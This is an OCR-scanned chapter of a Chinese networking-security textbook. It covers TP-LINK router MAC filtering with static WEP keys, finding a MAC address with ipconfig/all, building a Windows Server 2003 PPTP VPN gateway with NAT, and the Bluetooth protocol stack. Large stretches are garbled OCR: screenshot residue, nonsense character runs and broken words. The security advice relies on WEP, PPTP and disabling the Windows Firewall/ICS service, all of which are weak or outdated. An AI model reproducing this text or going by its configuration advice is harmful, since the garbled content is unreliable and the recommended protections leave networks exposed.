某 一 个 MAC 地 址 的 通过 ， 这 与 之 前 的 MAC 地 址 功能 是 一 样 的 。 

“ 密 钥 ” 填 入 了 10 位 AAAAAAAAAA ， 这 里 没有 “ 密 钥 格式 选择 ”， 只 支持 “16 
进 制 ” 的 输入 。 

最 后 单 击 “ 保 存 ” 即 可 ， 保 存 后 会 返回 上 一 级 界面 ， 结 果 如 图 9-11 所 示 。 

EE 


本 页 设置 WAC 雹 址 过 涛 采 控 $+ 算 机 对 可 无 栈 同 络 的 访问 、 
广 意 :64 位 完 钥 、128 位 守 角 和 152 位 密 钥 5 16 进 制 形式 ) 只 有 在 安全 认证 方式 为 开 
放 系 统 、 共 享 客 角 或 目 动 夺 择 而 且 设置 默认 究 4 时 才 有 效 ( 否则 视 为 允许 通过 ) 。 


uC 地址 过 涛 功能 : 已 开启 [天 司 这 源 ] 

过 涛 规则 : [2 元 Rs: 
个 光 放 列表 中 生效 规则 之 外 的 hc 增 址 访问 本 无 规 网 络 | 人 擅 述 
禁止 列表 中 生效 规则 之 外 的 WC 地 址 访问 本 无 本 网 络 | 个 密 钥 


[ww | 。。” WC 二 二。 [区 者 /英模 | 荐 下 区 
| 00-0N-29-A3-2C- 西 | 4 位 密 铺 | TL-TW200 x 


区 要 
[Cm ] [所 有 条 目 生效 ] [所 有 条 目 失效 ，] [ 志 隐 所 有 条 目 “| 
[Ea 


9-11 ”MAC 地 址 过 滤 功 能 开启 显示 


注意 到 上 面 的 “MAC 地 址 过 滤 功 能 ”的 状态 是 “已 开启 ”， 如 果 是 “已 关闭 ”， 右 边 
的 按钮 会 变 成 “开启 过 滤 ”， 单 击 这 个 按钮 来 开启 这 一 功能 。 至 此 ， 无 线路 由 器 这 一 端 配 
置 完成 。 

3) ”怎样 获取 网 卡 MAC 地 址 的 方法 

通过 电脑 DOS 界面 运行 ipconfig/all 这 个 命令 会 弹出 如 下 类 似 信息 ， 红 线 勾 勒 部 分 
“Physical Address” 对 应 的 就 是 处 于 连接 状态 的 网 卡 的 MAC 地 址 ， 如 图 9-12 所 示 。 
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连接 的 。 


: fae3-hbel5?61899 


Unknown 
No 
: No 


S Suffix - : 


TP-LINK TL-WN6 


D: \Docunents and Settings\fae3> 


9-12 ”IPconfig/all 命令 执行 结果 
2. 网 卡 TL-WN620G 的 配置 
打开 TL-WN620G 1 端 应 用 程序 主 界面 一 “用 户 配 置 文件 管理 ”一 “修改 ”， 会 弹 
出 “用 户 配 置 文件 管理 ” 对话 框 。 首 先是 “常规 ”页 填 入 和 无 线路 由 器 端 相 同 的 SSID1 一 一 
ws mp 
2 
常规 | 安全 | 高 | 


配置 文件 设置 
配置 文件 名 称 : | 


客户 端 名 称 : AE3-BE15761693 


网 络 标识 


9-13 用 户 配置 文件 管理 常规 选项 


然后 单 击 “高 级 ”页 ， 红 线 勾 勒 部 分 注意 选择 认证 模式 ， 可 以 保持 和 无 线路 由 器 端 相 
同 ， 由 于 我 们 的 路 由 器 上 选择 了 “自动 选择 ”模式 ， 所 以 这 里 无 论 选择 什么 模式 都 是 可 以 


如 果 这 个 选项 是 灰色 ， 就 请 先 配 置 “安全 ”页 面 的 参数 ， 回 过 头 再 来 这 里 配置 ， 如 
图 9-14 所 示 。 

接 下 来 我 们 进入 “安全 ”页 ， 如 图 9-15 同人 

先 选 择 “ 预 共享 密 钥 (静态 WEP)”， 单 击 “ 配 置 ” 按 钮 ， 进 入 设置 共享 密 钥 的 界 


面 ， 如 图 9-16 所 示 。 


[用 户 也 于 文 许 管 理 3 


| 全 WR | 


发 射 功 等级 ] 各 电 本 区 ， 「 
| eh 9 Pissu: fie ，， ， 悦 
mm 可 Sm: | Res Kis | 
Ac 癌 络 的 无 红 刘 
FF 2.4 GHz 54 Whps 
2.4 Ghr 11 Wbps | | Cemesms: re: ee 可 
| 尺 二 | 


密 角 长度 位) : 


64 120 152 
一 WIRE 过 
vr: 全 cer 
wr: 广 ere 
Tr: Eo 


[J] ww] 
图 9-16 设置 共享 密 钥 

将 图 9-16 中 用 红线 勾勒 的 参数 说 明 一 下 。 

(1) “ 密 钥 格式 ”必须 选择 “十 六 进 制 (0-9，A-F)。 

(2) 总 共 需 要 填 入 两 个 密 钥 : 密 钥 1 对 应 的 是 路 由 器 “无 线 配置 ”一 “MAC 地 址 过 滤 ” 
页 面 下 设置 的 单独 密 钥 ， 本 例 为 64 位 长 度 的 密 钥 AAAAAAAAAA:; 密 钥 2 对 应 的 是 路 
器 “无 线 配置 ”一 “基本 设置 ”页 面 下 设置 的 公共 密 钥 ， 本 例 为 128 位 长 度 的 密 钥 : 
L111ILITLLLLIILIL LL 。 


® 
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(3) 最 后 要 选中 “WEP 密 钥 1”( 注 意 “WEP 密 钥 1” 后 面 的 圆 单 击 )。 

(4) 单独 密 钥 和 公共 密 钥 的 位 置 是 不 能 更 改 的 。 

配置 完成 ， 双 击 “ 确 定 ” 回 到 客户 端 应 用 程序 主 界面 ， 我 们 可 以 看 到 网 卡 和 无 线路 由 
器 已 经 建立 了 连接 ， 如 图 9-17 所 示 。 


TP-LINK TL-Y16206 专 户 菇 应 用 程序 一 已 连 设备 。 2 


执行 内， 选项 中 ) 帮助 90 
当前 状态 | 用 户 文 件 等 理 | 数据 统计 | 


9-17 “网卡 和 无 线路 由 器 建立 连接 界面 


再 进入 路 由 器 “无 线 设置 ”一 “主机 状态 ”， 可 以 看 到 已 连接 的 网 卡 MAC 地 址 ， 在 
“无 线 网 络 主机 状态 ” 页面, 表 里 第 一 个 显示 的 是 无 线路 由 器 的 MAC 地 址 , 如 图 9-18 所 示 。 


无 易 网 络 主机 状 老 


本 页 显示 连接 到 本 无 线 网 络 的 所 有 主机 的 基本 信息 。 


| 厚 导 MAC 地 址 当前 状态 [接收 煞 据 包 数 | 发 送 数据 包 数 

| 1 | 00-0N-EB-00-18-40 局 用 | 0 508 

| | 00-0A-EB-A3-2C-E5 | oD 16 
LE 如 [要 多 ] 


9-18 无 线 网 络 主机 状态 


9.4 无 线 VPN 技术 


随 着 无 线 网 络 的 普及 , 对 其 管理 和 安全 使 用 也 提出 了 更 高 的 要 求 。 利 用 无 线 VPN 技术 
是 最 佳 的 选择 之 一 ， 下 面 对 其 作 简 单 介 绍 。 


9.4.1 无 线 VPN 技术 


1. 什么 是 VPN 


虚拟 专用 网 (VPN，Virtual Private Network) 是 一 种 利用 公共 网 络 来 构建 的 私人 专用 网 络 
技术 ， 不 是 真 的 专用 网 络 ， 但 却 能 够 实现 专用 网 络 的 功能 。 虚 拟 专 用 网 指 的 是 依靠 
ISP(Intemet 服务 提供 商 ) 和 其 他 NSP( 网 络 服务 提供 商 )， 在 公用 网 络 中 建立 专用 的 数据 通信 
网 络 的 技术 。 在 虚拟 专用 网 中 ， 任 意 两 个 结 点 之 间 的 连接 并 没有 传统 专 网 所 需 的 端 到 端的 
物理 链 路 ， 而 是 利用 某 种 公众 网 的 资源 动态 组 成 的 。 

IETF 草案 理解 基于 了 琴 的 VPN 为 :“ 使 用 下 机 制 仿真 出 一 个 私有 的 广域网 ”是 通过 私 


潼 洲 革 粕 半 ”车 潍 代 人 褒 睹 杀 囊 妇 弹 
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有 的 隧道 技术 ， 在 公共 数据 网 络 上 仿真 一 条 单 击 到 单 击 的 专线 技术 。 所 谓 虚 拟 ， 是 指 用 户 
不 再 需要 拥有 实际 的 长 途 数据 线路 ,而 是 使 用 Intemet 公众 数据 网 络 的 长 途 数据 线路 。 所谓 
专用 网 络 ， 是 指 用 户 可 以 为 自己 制定 一 个 最 符合 自己 需求 的 网 络 。 

2. VPN 的 安全 性 

目前 VPN 主要 采用 四 项 技术 来 保证 安全 ， 这 四 项 技术 分 别 是 隧道 技术 (Tunneling)、 加 
解密 技术 (Encryption & Decryption)、 密 钥 管 理 技术 (Key Management)、 使 用 者 与 设备 身份 
认证 技术 (Authentication)。 

1) ”隧道 技术 

隧道 技术 是 VPN 的 基本 技术 ， 类似 于 点 对 点 连接 技术 , 它 在 公用 网 建立 一 条 数据 通道 
(隧道 )， 让 数据 包 通过 这 条 隧道 传输 。 隧 道 是 由 隧道 协议 形成 的 ， 分 为 第 二 、 三 层 隧 道 协 
议 。 第 二 层 隧道 协议 是 先 把 各 种 网 络 协议 封装 到 PPP 中 , 再 把 整个 数据 包装 入 隧道 协议 中 。 
这 种 双 层 封装 方法 形成 的 数据 包 靠 第 二 层 协 议 进行 传输 。 第 二 层 隧道 协议 有 L2F、PPTP、 
L2TP 等 。L2TP 协议 是 目前 IETF 的 标准 ， 由 IETF 融合 PPTP 与 L2F 而 形成 。 第 三 层 隧道 
协议 是 把 各 种 网 络 协议 直接 装 入 隧道 协议 中 ， 形 成 的 数据 包 依 靠 第 三 层 协 议 进行 传输 。 第 
三 层 隧 道 协议 有 VTP、IPSec 等 。IPSec(IP Security) 是 由 一 组 RFC 文档 组 成 ,定义 了 一 个 系 
统 来 提供 安全 协议 选择 、 安 全 算法 ， 确 定 服务 所 使 用 密 钥 等 服务 ， 从 而 在 人 P 层 提供 安全 
保障 。 

2) ”加 解密 技术 

加 解密 技术 是 数据 通信 中 一 项 较 成 熟 的 技术 ，VPN 可 直接 利用 现 有 技术 。 

3) ” 密 钥 管理 技术 

密 钥 管理 技术 的 主要 任务 是 如 何在 公用 数据 网 上 安全 地 传递 密 钥 而 不 被 窃取 。 现 行 密 
钥 管理 技术 又 分 为 SKIP 与 ISAKMP/OAKLEY 两 种 。SKIP 主要 是 利用 Diffie-Hellman 的 演 
算法 则 ， 在 网 络 上 传输 密 钥 ; 在 ISAKMP/OAKLEY 中 ， 双 方 都 有 两 把 密 钥 ， 分 别 用 于 公 
用 、 私 用 。 

4) ”使 用 者 与 设备 身份 认证 技术 

使 用 者 与 设备 身份 认证 技术 最 常用 的 是 使 用 者 名 称 与 密码 或 卡片 式 认 证 等 方式 ， 目 前 
这 方面 做 的 比较 成 熟 的 有 国内 的 深信 福 科 技 的 VPN 解决 方案 。 

3. VPN 网 络 的 可 用 性 

通过 VPN， 企 业 可 以 以 更 低 的 成 本 连接 远程 办 事 机 构 、 出 差 人 员 以 及 业务 合作 伙伴 关 
键 业务 。 虚 拟 网 组 成 之 后 ， 远 程 用 户 只 需 拥有 本 地 ISP 的 上 网 权限 ， 就 可 以 访问 企业 内 部 
资源 ， 这 对 于 流动 性 大 、 分 布 广泛 的 企业 来 说 很 有 意义 ， 特 别 是 当 企业 将 VPN 服务 延伸 到 
合作 伙伴 方 时 ， 便 能 极 大 地 降低 网 络 的 复杂 性 和 维护 费用 。 

VPN 技术 的 出 现 及 成 熟 为 企业 实施 ERP、 财 务 软件 、 移 动 办 公 提供 了 最 佳 的 解决 方案 。 

一 方面 VPN 利用 现 有 互联 网 , 在 互联 网 上 开拓 隧道 , 充分 利用 企业 现 有 的 上 网 条 件 ， 
无 需 申请 昂贵 的 DDN 专线， 运营 成 本 低 。 另 一 方面 ，VPN 利用 IPSEC 等 加 密 技 术 ， 使 在 
通道 内 传输 的 数据 ， 有 着 高 达 168 位 的 加 密 措施 ， 充 分 保证 了 数据 在 VPN 通道 内 传输 的 安 
全 性 。 
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4. VPN 网 络 的 可 管理 性 


随 着 技术 的 进步 ， 各 种 VPN 软 硬 件 解决 方案 都 包含 了 路 由 、 防 火 墙 、VPN 网 关 等 三 
方面 的 功能 ， 企 业 或 政府 通过 购买 VPN 设备 ， 达 到 一 物 多 用 的 功效 ， 既 满足 了 远程 互联 的 
要 求 ， 而 且 还 能 在 相当 程度 上 防止 黑客 的 攻击 、 并 能 根据 时 间 、 了 王 、 内 容 、Mac 地 址 、 服 
务 内 容 、 访 问 内 容 等 多 种 服务 来 限制 企业 公司 内 部 员工 上 网 时 的 行为 ， 一 举 多 得 。 

VPN 设备 的 安装 调试 、 管 理 、 维 护 都 极为 简单 ， 而 且 都 支持 远程 管理 ， 大 多 数 VPN 
硬件 设备 甚至 可 通过 中 央 管 理 器 进行 集中 式 的 管理 维护 。 出 差 人 员 也 可 以 通过 客户 端 软件 
与 中 心 的 VPN 设备 建立 VPN 通道 ， 从 而 达到 访问 中 心 数据 等 资源 的 目的 。 让 互联 无 处 不 
在 ， 极 大 地 方便 了 企业 及 政府 的 数据 、 语 音 、 视 频 等 方面 的 应 用 。 


9.4.2 ”Win2003 的 VPN 服务 器 搭建 


下 面 我 们 介绍 一 下 通过 Windows Server 操作 系统 自 带 的 路 由 和 远程 访问 功能 来 实现 
NAT 共享 上 网 和 VPN 网关 的 功能 。 通 过 本 实例 加 深 对 无 线 VPN 技术 的 理解 。 

我 们 的 目标 是 要 实现 在 异地 通过 VPN 客户 端 访 问 总 部 局 域 网 各 种 服务 器 资源 。 网络 拓 
扑 示 意图 如 图 9-19 所 示 。 


9-19 无 线 VPN 拓扑 结构 图 


1. 系统 前 期 准备 工作 


服务 器 硬件 包括 双 网 卡 ， 一块 接 外 网 ， 一 块 接 局 域 网 。 在 Windows 2003 中 VPN 服务 
称 之 为 “路 由 和 远程 访问 ”， 默 认 状 态 已 经 安装 。 只 需 对 此 服务 进行 必要 的 配置 使 其 生效 
即 可 。 

首先 确定 是 否 开启 了 Windows Firewall/Internet Connection Sharing (CS) 服 务 ， 如 果 开 
启 了 Windows Firewall/Intemet Connection Sharing (ICS) 服 务 的 话 ， 在 配置 “路 由 和 远程 访 
问 ” 时 系统 会 弹出 如 图 9-20 所 示 的 对 话 框 。 

我 们 只 要 去 “开始 ”一 “程序 ”一 “管理 工具 ”一 “服务 ”里 面 把 Windows Firewall/Intemet 
Connection Sharing (ICS) 停 止 ， 并 设置 启动 类 型 为 禁用 ， 如 图 9-21 所 示 。 
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9-21 设置 Windows Firewall/Internet Connection Sharing (ICS) 
2. 开启 VPN 和 NAT 服务 
依次 选择 “开始 ”一 “程序 ”一 “管理 工具 ”一 “路 由 和 远程 访问 ”， 打 开 “ 路 由 和 
远程 访问 ”服务 窗口 ， 再 在 窗口 左边 右 击 本 地 计算 机 名 ， 选 择 “ 配 置 并 启用 路 由 和 远程 访 
问 ”， 如 图 9-22 所 示 。 
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[二 |[ 白 男 |X 林 DB 
EF 程 访 问 服务 器 的 配置 
和 运程 访问 ， 在 “操作 ”菜单 上 单 击 “配置 并 启用 路 由 


图 9-22 配置 并 启用 路 由 和 远程 访问 
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在 弹出 的 “路 由 和 远程 访问 服务 器 安装 向 导 ” 中 单 击 “ 下 一 步 ”按钮 ， 出 现 如 图 9-23 
所 示 的 对 话 框 。 

由 于 我 们 要 实现 NAT 共享 上 网 和 VPN 拨 入 服务 器 的 功能 ， 所 以 我 们 选择 “ 自 定义 配 
置 ” 选 项 ， 单 击 “ 下 一 步 ”按钮 ， 如 图 9-24 所 示 。 

在 这 里 我 们 选择 “VPN 访问 ”和 “NAT 和 基本 防火 墙 ” 选项 ， 单 击 “ 下 一 步 ” 按 钮 ， 
在 弹出 的 对 话 框 中 单 击 “ 完 成 ”， 系 统 会 提示 是 否 启 动 服务 ， 单 击 “ 是 ”， 系 统 会 按 刚 才 


图 9-23 ”路 由 和 远程 访问 服务 器 安装 向 导 


ETEEEEEE 


关闭 此 册 导 后 ， 僻 可 以 在 咯 册 和 运程 访问 控制 和 中 配置 选择 的 服务 。 国 


图 9-24 ”路 由 和 远程 访问 服务 器 服务 设置 


图 9-25 ”路 由 和 远程 访问 服务 器 配置 完成 界面 


3. 配置 NAT 服务 
右 击 “NAT/ 基 本 防火 墙 ” 选 项， 选择 “新 增 接 口 ”， 弹 出 如 图 9-26 所 示 的 对 话 框 。 


图 9-26 NAT 新 增 接口 设置 


在 这 里 我 们 根据 自己 的 网 络 环境 选择 连接 Internet 的 接口 , 选择 “wan” 接 口 , 单 击 “ 确 
定 ” 按 钮 ， 弹 出 “网 络 地 址 转换 一 wan 属性 ”对 话 框 ， 进 行 如 图 9-27 所 示 配 置 。 


网络 地 址 转换 - van 尾 性 


9-27 ”网 络 地 址 转换 一 wan 属性 设置 


由 于 我 们 这 个 网 卡 是 连接 外 网 的 ， 所 以 选择 “公用 接口 连接 到 Intemet” 和 “在 此 接口 
上 启用 NAT” 选 项 ， 并 选择 “在 此 接口 上 启用 基本 防火 墙 ” 选项 ， 这 对 服务 器 的 安全 是 非 
常 重要 的 。 

下 面 我 们 单 击 “ 服 务 和 端口 ”设置 服务 器 允许 对 外 提供 PPTP VPN 服务 ， 在 “服务 和 


(> 计算 机 网 络 支 全 


端口 ”界面 里 单 击 “VPN 网 关 (PPTP)”， 在 弹出 的 “编辑 服务 ”对 话 框 中 进行 如 图 9-28 
所 示 的 设置 。 


图 9-28 VPN 网 关 (PPTP) 编 辑 服 务 设置 


单 击 “确定 ”按钮 ， 回 到 “服务 和 端口 ”选项 卡 ， 确 保 选 中 “VPN 网 关 (PPTP)”， 如 
9-29 所 示 。 


图 9-29 Wan 端口 和 服务 选项 
4. 根据 需要 设置 VPN 服务 


设置 连接 数 ， 右 击 左边 树 形 目录 里 的 “端口 ”选项 ， 选 择 属性 ， 弹 出 如 图 9-30 所 示 对 
话 框 。 


图 9-30 Wan 端口 属性 


Windows Server 2003 企业 版 VPN 服务 默认 支持 128 个 PPTP 连接 和 128 个 L2TP 连接 ， 
因为 我 们 这 里 使 用 PPTP 协议 ， 所 以 我 们 双击 “WAN 微型 端口 PPOE)” 选 项 ， 在 弹出 的 对 
话 框 里 根据 自己 的 需要 设置 所 需 的 连接 数 ，Windows Server 2003 企业 版 最 多 支持 30000 个 
L2TP 端口 、16384 个 PPTP 端口 。 

设置 卫 地 址 : 右 击 左边 树 形 目录 里 的 本 地 服务 器 名 ， 选 择 “ 属 性 ”并 切换 到 IP 选项 
卡 ， 如 图 9-31 所 示 。 


PLMxnG3FIPK8D8Y (本 地 ) 尾 性 


图 9-31 本 地 服务 器 IP 设置 
这 里 我 们 选择 “静态 地 址 池 ”， 单 击 “ 添 加 ”按钮 ， 根 据 需要 接 入 数量 ， 任 意 添加 一 
个 地 址 范围 ， 但 是 不 要 和 本 地 下 地址 冲突 ， 如 图 9-31 所 示 。 
单 击 “ 确 定 ” 按 钮 回 到 “IP” 选 项 卡 ， 单 击 “确定 ”按钮 应 用 设置 。 
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图 9-32 IP 地 址 范围 设置 
5. 设置 远程 访问 策略 ， 人 允许 指定 用 户 拨 入 


新 建 用 户 和 组 : 单 击 “ 开 始 ” 一 “程序 ”一 “管理 工具 ”一 “计算 机 管理 ”， 弹 出 “ 计 
算 机 管理 ”对 话 框 ， 如 图 9-33 所 示 。 


| 电文 件 如 按 作 的 可 看 二 忆 四。 下 助人 0 
中 才 四国 | 日 
EBRD LY 区 


图 9-33 “计算 机 管理 ”对 话 框 


选择 “本 地 用 户 和 组 ”， 右 击 “ 用 户 ” 一 “新 用 户 ”， 进 行 如 图 9-34 所 示 的 设置 ， 单 
击 “ 创 建 ”按钮 新 增 一 个 用 户 。 


图 9-34 “新 用 户 ” 对 话 框 


WITT 第 9 墓 无 绪 网 任 安 全 


在 左边 的 树 形 目录 中 右 击 “组 ”一 “新 建 组 ”， 添 入 “组 名 ”， 单 击 “ 添 加 ”按钮 ， 
在 弹出 的 “选择 用 户 ” 对 话 框 中 ， 单 击 “ 高 级 ”一 “立即 查找 ”， 选 择 刚才 建立 的 “test?” 
用 户 ， 把 用 户 加 入 刚才 建立 的 组 ， 如 图 9-35 所 示 。 


er 二 中 


图 9-35 “新 建 ”对 话 框 

设置 远程 访问 策略 : 返回 “路 由 和 远程 访问 ”窗口 ， 右 击 左面 树 形 目录 中 的 “远程 访 
问 策略 ”， 选 择 “ 新 建 远程 访问 策略 ”， 在 弹出 的 对 话 框 中 单 击 “ 下 一 步 ” 按 钮 ， 填 入 方 
便 记忆 的 “策略 名 ”; 单 击 “ 下 一 步 ” 按 钮 ， 选 择 “VPN” 选 项 ， 单 击 “ 下 一 步 ” 按 钮 ， 
单 击 “ 添 加 ”按钮 把 刚才 新 建 的 组 加 入 到 这 里 ， 单 击 “ 下 一 步 ” 按 钮 ， 直 到 “完成 ”， 就 
完成 了 远程 策略 的 设置 ， 后 面 如 果 新 的 用 户 需 要 VPN 服务 ， 只 要 为 该 用 户 新 建 一 个 账号 ， 
并 加 入 刚才 新 建 的 “test” 组 就 可 以 了 。 

6. 设置 动态 域名 

我 们 把 动态 域名 放 在 这 里 来 说 。 因 为 一 般 企业 接 入 互联 网 应 该 有 固定 ， 这 样 客户 机 
便 可 随时 随地 对 服务 端 进行 访问 ; 而 如 果 你 是 家 庭 用 户 采 用 的 ADSL 宽带 接 入 的 话 ， 那 一 
般 都 是 每 次 上 网 地 址 都 不 一 样 的 动态 ， 所 以 需 在 VPN 服务 器 上 安装 动态 域名 解析 软件 ， 
才能 让 客户 端 在 网 络 中 找到 服务 端 并 随时 可 以 拨 入 。 笔 者 常用 的 动态 域名 解析 软件 为 : 花 
生 壳 ， 可 以 在 www.oray.net 下 载 ， 其 安装 及 注意 事项 请 参阅 相关 资料 ， 这 里 不 再 详 述 。 

7. VPN 客户 端 配置 

这 一 端 配置 相对 简单 得 多 ， 只 需 建立 一 个 到 VPN 服务 端的 专用 连接 即 可 。 首 先 肯定 客 
户 端 也 要 接 入 Internet 网 络 ， 接 着 笔者 以 Windows XP 客户 端 为 例 说 明 ， 其 他 的 Windows 
2000 操作 系统 设置 都 大 同 小 异 。 

首先 ， 在 桌面 “网 上 邻居 ”图 标 单 击 右键 选择 属性 ， 之 后 双击 “新 建 连接 向 导 ” 打 开 
向 导 窗 口 后 单 击 “ 下 一 步 ” 按 钮 ， 如 图 9-36 所 示 。 
接着 在 “网 络 连接 类 型 ”窗口 单 击 ， 选 第 二 项 “连接 到 我 的 工作 场所 的 网 络 ”， 如 
图 9-37 所 示 。 
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芍 迎 使 用 新 建 连 接 向 导 


此 向 导 格 帮助 您 
。 连接 到 Internet。 
。 连接 到 专用 网 络 ,例如 炊 的 办 公 网 络 。 


。 设置 一 个 家 庭 或 小 型 办 公 网 络 。 


要 继续 ,请 单 击 “ 下 一 步 ”。 


9-36 “新 建 连接 向 导 ” 对 话 框 


网 络 连 接 类 型 


人 〇 连接 到 Internet (C) 
连接 到 Internet ,这样 你 就 可 以 浏览 Yeb 或 阅读 电子 邮件 。 


外 连 接 到 委 的 工作 场所 的 网 络 @) 
尖 吕 个 商业 网 才 (人 用 扩 导 王 YI ,这样 作 下 可 以 在 家 里 了 者 其它 地 


口 设 置 家 庭 或 小 型 办 公 网 络 (5) 
连接 到 | 一 个 现 有 的 家 庭 或 小 型 办 公 网 络 ， 或 者 设置 一 个 新 的 。 
口 坡 置 高 令 连 接 全) 


口 ， 串口 或 红外 请 吕 直接 连接 到 其它 计算 机 ,或 设置 此 计算 机 使 其它 
和 ; 2 


< 上 = 步 @ 取消 


9-37 “网 络 连接 类 型 ”对 话 框 


继续 单 击 “ 下 一 步 ” 按 钮 ， 在 如 图 9-38 所 示 的 网 络 连接 方式 窗口 里 选择 第 二 项 “虚拟 


专用 网 络 连接 ”。 
PL 0 


创建 下 列 辽 接 


口技 号 连接 @) 
电话 线 连 接 ， 或 通过 儿 合 业务 数字 网 CSDM) 电话 线 连 


回 要 狼 专 用 同 络 连 接 @GJ 
使 用 虚拟 专用 网 络 9?iD 通 过 Internet 连接 到 网 络 。 


高 
有 
Sr 
人 
材 
计 
算 
机 
系 
列 


EESsw)E-sm) [La ] 


9-38 ”选择 连接 “虚拟 专用 网 络 连接 ”对 话 框 
接着 为 此 连接 命名 后 单 击 “ 下 一 步 ” 按 钮 ， 如 图 9-39 所 示 。 


友 建 连 区 向 导 
连接 名 
指定 连接 到 | 小 的 工作 场所 的 连接 名 称 。 


在 下 面 框 中 输入 此 连接 的 名 称 - 
公司 名 多) 
港 通 公司 


例 名 ,您 可 以 输入 您 的 工作 地 点 名 或 您 连接 本 | 的 服务 器 名 。 


图 9-39 连接 名 称 设 置 对 话 框 
接着 出 现 的 “可 用 连接 ”窗口 保持 “只 是 我 使 用 ”的 默认 选项 。 最 后 ， 为 方便 操作 ， 
可 以 选择 “在 桌面 上 建立 快捷 方式 ”选项 ， 单 击 完 成 即 会 出 现 如 图 9-40 所 示 的 VPN 连接 
窗口 。 
二 可 以 先 确认 公用 网 络 是 否 已 接 好 。 


Hp 在 建立 虚拟 连接 之 前 可 以 自动 拟 到 Internet 或 其 它 公 用 网 络 的 初始 


CEE 


图 9-40 ”VPN 连接 窗口 


在 “VPN 服务 器 选择 ”窗口 里 ， 等 待 我 们 输入 的 是 VPN 服务 端的 固定 内 容 ， 可 以 是 
国定 人 ， 也 可 以 是 由 花生 这 软件 解析 出 来 的 动态 域名 (此 域名 需要 在 提供 花生 这 软件 的 
www.oray.net 网 站 下 载 )， 如 图 9-41 所 示 。 

输入 访问 VPN 服务 端 合法 账户 后 的 操作 就 跟 XP 下 “远程 桌面 ”功能 一 样 了 。 连 接 成 
功 后 在 右 下 角 状 态 栏 会 有 图 标 显示 。 

连接 后 的 共享 操作 ， 只 要 有 过 一 些 局 域 网 使 用 经 验 的 朋友 应 该 知道 怎么 做 。 

一 种 办 法 是 通过 “网 上 邻居 ”查找 VPN 服务 端 共享 目录 ; 另 一 种 办 法 是 在 浏览 器 里 输 
入 VPN 服务 端 固定 人 P 地 址 或 动态 域名 也 可 打开 共享 目录 资源 。 这 其 实 已 经 跟 在 同一 个 局 
域 网 内 的 操作 没什么 区 别 了 ， 自 然 也 就 可 以 直接 单 击 某 个 视频 节目 播放 ， 省 去 下 载 文 件 这 
一 步 所 花 的 时 间 了 。 
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新 建 连接 向 导 
YP 服务 器 选择 CN 
YPN 服务 器 的 名 称 或 地 址 是 什么 ? 


输入 您 正 连接 的 计算 机 的 主机 名 或 IF 地址。 
主机 名 或 IF 地 址 (例如 ，mwicroseft_ com 或 157.54.0.1) 0D: 


EEE Cam] 


9-41 ”VPN 服务 器 选择 


9.5 蓝牙 安全 


随 着 计算 机 网 络 和 移动 电话 技术 的 迅猛 发 展 ， 人 们 感到 越 来 越 迫切 需要 发 展 小 范围 的 
无 线 数据 与 语音 通信 技术 。 于 是 爱立信 、IBM、 英 特 尔 、 诺 基 亚 和 东芝 等 公司 在 1998 年 联 
合 推 出 一 项 新 的 无 线 网 络 技 术 ， 即 蓝牙 技术 。 蓝 牙 技术 可 以 解决 小 型 移动 设备 间 的 无 线 互 
连 问题 ， 它 的 硬件 市 场 非常 广阔 ， 涵 盖 了 局 域 网 中 的 各 类 数据 及 语音 设备 ， 如 计算 机 、 移 
动 电话 、 小 型 个 人 数字 助理 (PDA) 等 。 

蓝牙 技术 面向 的 是 移动 设备 问 的 小 范围 连接 ， 从 本 质 上 说 它 是 一 种 代替 电线 的 无 线 网 
络 技术 。 为 了 保证 移动 设备 间 数 据 传输 的 安全 性 ， 该 技术 持 应 用 层 和 链 路 层 的 鉴 权 和 加 密 ， 
本 节 要 讨论 的 就 是 蓝牙 技术 常见 的 安全 问题 。 


9.5.1 蓝牙 应 用 协议 栈 


1999 年 12 月 1 日 ,Bluetooth SIG(Special Interest Group) 发 布 了 蓝牙 标准 的 最 新 版 :1.0B 
版 。 蓝 牙 标准 包括 两 大 部 分 : Core 和 Profiles。Core 是 蓝牙 的 核心 ， 它 主要 定义 了 蓝牙 的 
技术 细节 ， 而 Profiles 部 分 则 定义 了 在 蓝牙 的 各 种 应 用 中 协议 栈 的 组 成 。 

蓝牙 标准 主要 定义 的 是 底层 协议 ， 同 时 为 保证 和 其 他 协议 的 兼容 性 ， 也 定义 了 一 些 高 
层 协 议和 相关 接口 。 从 ISO 的 OSI 七 层 协议 标准 来 看 ， 蓝 牙 标 准 主要 定义 的 是 物理 层 、 链 
路 层 和 网 络 层 的 结构 。 

(1) 射频 协议 (RF/Radio ProtocoD): 定义 了 蓝牙 发 送 器 和 接收 器 的 各 个 参数 ， 包 括 发 送 
器 的 调制 特性 ， 接 收 器 的 灵敏 度 、 抗 干扰 性 能 、 互 调 特性 和 接收 信号 强度 指示 等 。 

(2) 基带 / 链 路 控制 协议 (Baseband/LC ProtocoD): 定义 了 基带 部 分 协议 和 其 他 低层 链 路 
功能 ， 是 蓝牙 技术 的 核心 。 

(3) 链 路 管理 协议 (LMP): 用 于 链 路 的 建立 、 安 全 和 控制 ， 为 此 L MP 定义 了 许多 过 
程 来 完成 不 同 的 功能 。 

(4) 主机 控制 器 接口 (HCI: Host Controller Interface) 协 议 : 描述 了 主机 控制 接口 功能 上 


的 标准 ， 提 供 了 一 个 基带 控制 器 和 链 路 管理 器 (LM) 得 知 硬件 状态 和 控制 寄存 器 命令 的 接 
口 ， 在 蓝牙 中 起 着 中 间 层 的 作用 。 这 向 下 给 链 路 控制 器 协议 和 链 路 管理 协议 提供 接口 ， 并 
提供 一 个 访问 蓝牙 基带 的 统一 方法 。HCI 是 硬件 和 软件 都 包含 的 部 分 。 

(5) 逻辑 链 路 控制 和 适 配 协议 (L2CAP: Logical Link Control and Adaptation Protocol): 
支持 高 层 协议 复 用 、 帧 的 组 装 和 拆 分 、 传 送 QoS 信息 。 L2CAP 提供 面向 连接 和 非 连接 两 种 
业务 ， 人 允许 高 层 最 多 达 64kbit/s 的 数据 ， 以 一 种 有 限 状 态 机 (ESMD) 的 方式 来 进行 控制 ， 目 前 
只 支持 异步 无 连接 链 路 (ACL)。 

(6) 服务 发 现 协议 (SDP: Service Discover Protocol): 如 何 发 现 蓝 牙 设备 所 提供 服务 的 
协议 ， 使 高 层 应 用 能 够 得 知 可 提供 的 服务 。 在 两 个 蓝牙 设备 第 一 次 通信 时 ， 需 要 通过 SDP 
来 了 解 对 方 能 够 提供 何 种 服务 ， 并 将 自己 可 提供 的 服务 通知 对 方 。 

(7) 高 层 协议 : 包括 串口 通信 协议 (RFCOMM)、 电 话 控制 协议 (TCS)、 对 象 交换 协议 
